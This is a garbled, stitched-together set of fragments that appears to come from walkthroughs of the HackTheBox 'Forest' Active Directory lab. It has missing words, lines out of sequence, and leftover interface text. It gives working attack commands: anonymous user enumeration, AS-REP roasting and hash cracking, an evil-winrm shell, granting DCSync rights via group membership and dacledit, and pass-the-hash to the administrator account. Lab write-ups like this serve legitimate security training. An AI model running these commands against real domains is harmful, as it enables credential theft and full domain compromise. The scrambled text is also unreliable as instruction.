net group "Exchange Windows Permissions" hacker /add /domain Use code with caution. 3. Write discretionary ACLs (DCSync Attack)
From our Evil-WinRM shell, we need to download and execute , the BloodHound data collector. First, start a Python HTTP server on your attacking machine:
Use enumdomusers to generate a list of valid usernames, such as , andy , and mark . Phase 2: Initial Access via AS-REP Roasting
: Identify users that do not require Kerberos pre-authentication. Use GetNPUsers.py from the Impacket suite to request an AS-REP for the user svc-alfresco . Extract the hash and crack it locally using John the Ripper to obtain the plaintext password. : Use the cracked credentials to gain a remote shell via Evil-WinRM Privilege Escalation BloodHound Analysis SharpHound forest hackthebox walkthrough best
With a list of valid usernames, check for accounts that do not require Kerberos pre-authentication. This attack vector is known as . Executing the Attack
The script dumps the password hashes for all domain users, including the account:
rpcclient -U "" -N 10.10.10.161 enumdomusers net group "Exchange Windows Permissions" hacker /add /domain
The tool successfully retrieves a Kerberos AS-REP hash for the user . Cracking the Hash
If the credentials are valid and WinRM is available, access can be gained via evil-winrm : evil-winrm -i 10.10.10.161 -u svc-alfresco -p [password] Use code with caution. Phase 4: Privilege Escalation
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force First, start a Python HTTP server on your
Find domain: DC=htb,DC=local
You do not need to crack the Administrator password. Use the obtained NTLM hash to log in directly via Pass-the-Hash using evil-winrm .
Check for users with :
Here’s the about the best Forest walkthroughs (especially the ones rated highly by the community on forums, GitHub, or YouTube):
python3 dacledit.py -action grant -principal attacker -rights DCSync -dc-ip 10.10.10.161 htb.local/attacker:Password123! Use code with caution. Step 4: Perform a DCSync Attack